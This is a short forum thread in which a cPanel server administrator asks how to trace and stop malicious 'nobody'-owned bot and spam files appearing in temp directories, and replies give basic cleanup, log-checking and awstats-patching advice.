some nobody files "sleep in my /var/tmp, /tmp,/ dev/shm
My server is cpanel + fedora core 2. I hosted around near 200 webistes on one sevrer. But mostly is inactive.
I facing a problem recently. I check /var/tmp, /tmp,/ dev/shm everyday. I found that I usually see "nobody" files like bot, edddrop, spam files appear in /var/tmp, /tmp,/ dev/shm. I think is come from vulnerability scripts webiste.
I unbale to login server any times to delet it. May I know any idea can trave the files where they from and fix the vulnerability scripts webiste. Do we have any method to protect it?
Kill the processes if they're running, delete the files, patch Apache if needed, and check the logs to see which script was exploited to download the files. Look in Apache's access_log for "wget" and you'll probably find the command sent to an insecure script.
You are on cpanel. Check your version of awstats through any site's awstats utility. If yours is outdated, its possible that your version might be one of the ones that still has the security hole that allows rootkits, irc bots or other malicious pieces in your var folder.